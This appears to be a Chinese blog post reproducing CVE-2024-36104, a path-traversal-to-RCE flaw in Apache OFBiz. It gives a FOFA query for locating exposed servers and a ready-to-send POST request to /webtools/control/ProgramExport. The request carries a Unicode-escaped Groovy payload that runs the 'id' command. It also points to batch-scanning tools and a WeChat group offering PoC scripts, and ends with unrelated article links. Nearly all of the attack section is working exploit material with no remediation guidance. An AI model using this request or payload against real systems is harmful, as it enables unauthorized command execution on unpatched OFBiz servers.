当前位置: 首页 > news >正文

【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)

0x01 产品简介

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.otbiz.webapp.control.ControlFiter类对路径(请求URL中的特殊字符(如;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过webtools/control/ProgramExpor接囗的编程导出功能执行任意Groovy代码获取系统权限。

0x03 搜索语法

app="Apache_OFBiz"

在这里插入图片描述

0x04 漏洞复现

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: your-ip
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Type: application/x-www-form-urlencodedgroovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.lryc.cn/news/367505.html

相关文章:

  • 数据库表中创建字段查询出来却为NULL?
  • 缓存方法返回值
  • 【十大排序算法】快速排序
  • linux系统ubuntu中在命令行中打开图形界面的文件夹
  • 【C++11数据结构与算法】C++ 栈
  • pdf文件如何防篡改内容
  • QT 音乐播放器【二】 歌词同步+滚动+特效
  • 关于怎么用Cubemx生成的USBHID设备实现读取一体的鼠标键盘设备(改进版)
  • Soildworks学习笔记(二)
  • Linux配置uwsgi环境
  • Nagios的安装和使用
  • Numba 的 CUDA 示例(4/4):原子和互斥
  • 【机器学习】机器学习引领AI:重塑人类社会的新纪元
  • 【制作面包game】
  • Django更改超级用户密码
  • ROS基础学习-ROS通信机制进阶
  • 【Vue3】shallowReactive() and shallowReadonly()
  • 【javaEE初阶】
  • 深度学习 - 梯度下降优化方法
  • Steam下载游戏很慢?一个设置解决!
  • 51单片机采用定时器T1的方式1的中断计数方式,外接开关K4按4次后,8只LED闪烁不停
  • windows系统 flutter 开发环境配置
  • 【线性代数】SVDPCA
  • 1.Vue2使用ElementUI-初识及环境搭建
  • OS复习笔记ch7-3
  • MFC 教程-回车时窗口退出问题
  • CTFHUB-SQL注入-字符型注入
  • Docker配置Redis集群以及主从扩容与缩容
  • 【计算机网络】 传输层
  • 山东大学软件学院项目实训-创新实训-基于大模型的旅游平台(二十七)- 微服务(7)